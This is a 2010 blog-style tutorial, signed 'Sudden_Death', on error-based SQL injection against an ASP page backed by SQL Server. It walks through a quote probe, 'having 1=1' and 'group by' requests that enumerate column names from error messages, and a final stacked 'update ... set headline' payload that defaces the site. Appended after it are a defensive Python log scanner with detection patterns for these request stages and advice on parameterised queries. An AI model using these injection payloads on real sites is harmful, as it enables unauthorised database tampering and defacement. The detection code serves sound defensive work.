Friday, 09 July 2010

SQLI ( Injection ASP )

EXAMPLE:

http://www.target.com/dari_media.asp?id=795

http://www.target.com/dari_media.asp?id=795'

The following appears:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'media.Tanggal' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/dari_media.asp, line 7

That means the site is vulnerable... ,~_~, Carry on...!!!

Then append %20having%201=1

Example:

http://www.target.com/dari_media.asp?id=795%20having%201=1

The following appears: Column 'media.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

*Note: 'media.ID' (meaning table = media and column = ID)

*So: Column 'media.ID'

Then check the table one column at a time, for example:

http://www.target.com/dari_media.asp?id=795%20group%20by%20media.ID%20having%201=1

The following appears: Column 'media.Tanggal' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Then append media.Tanggal after media.ID, like this:

http://www.target.com/dari_media.asp?id=795%20group%20by%20media.ID,media.Tanggal%20having%201=1

The following appears: Column 'media.Jam' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Then append media.Jam after media.ID,media.Tanggal, like this:

http://www.target.com/dari_media.asp?id=795%20group%20by%20media.ID,media.Tanggal,media.Jam%20having%201=1

The following appears: Column 'media.sumber' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Then append media.sumber after media.ID,media.Tanggal,media.Jam, like this:

http://www.target.com/dari_media.asp?id=795%20group%20by%20media.ID,media.Tanggal,media.Jam,media.sumber%20having%201=1

The following appears: Column 'media.Headline' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Then keep going until you reach the end, that is, until this kind of message stops appearing:

No more messages of the form: Column 'xxx.xx' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Once you have reached the end, change it to this:

Put it in headline, or wherever you like; I am going to put it in headline. If there is no headline column, look for another name, "whichever you like" (basically anything that looks like it shows up on the front of the admin page), and use that name.

For example:

http://www.target.com/dari_media.asp?id=795%20update%20media%20set%20headline%20='Terserah lo mau kata² apa';--%20????

Created By Sudden_Death
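Seen from the defender's side, the request sequence above leaves a distinctive trail in web-server logs: a numeric id parameter that first carries a quote, then having / group by, then a stacked update. The following is an added detection example, not part of the original post; the four-field log layout, the sample lines and the function names are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines (method, path, query, status); not taken from a real server.
SAMPLE_LOG = """\
GET /dari_media.asp id=795 200
GET /dari_media.asp id=795' 500
GET /dari_media.asp id=795%20having%201=1 500
GET /dari_media.asp id=795%20group%20by%20media.ID%20having%201=1 500
GET /dari_media.asp id=795%20group%20by%20media.ID,media.Tanggal%20having%201=1 500
GET /dari_media.asp id=795%20update%20media%20set%20headline%20='x';-- 200
GET /dari_media.asp id=796 200
"""

# Ordered most severe first; the first rule that matches names the stage.
RULES = [
    ("write", re.compile(r";|\b(update|insert|delete|drop|exec)\b", re.I)),
    ("enumeration", re.compile(r"\b(having|group\s+by)\b", re.I)),
    ("probe", re.compile(r"['\"]")),
]

def classify(value):
    """Return None for a plain integer id, else the stage the value resembles."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    for stage, pattern in RULES:
        if pattern.search(value):
            return stage
    return "non-numeric"

def scan(log_text, param="id"):
    """Return (line_no, path, stage, status, decoded_value) per suspicious request."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) != 4:
            continue  # not in the assumed 4-field layout
        _method, path, query, status = fields
        for pair in query.split("&"):
            key, _, raw = pair.partition("=")
            if key.lower() != param:
                continue
            value = unquote_plus(raw)  # decode %20 and + before matching
            stage = classify(value)
            if stage:
                findings.append((line_no, path, stage, int(status), value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A run of 500 responses on the same page followed by a "write" finding is the pattern to alert on. The durable fix is to accept only an integer for id, bind it as a query parameter, and stop returning database error text to the browser.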
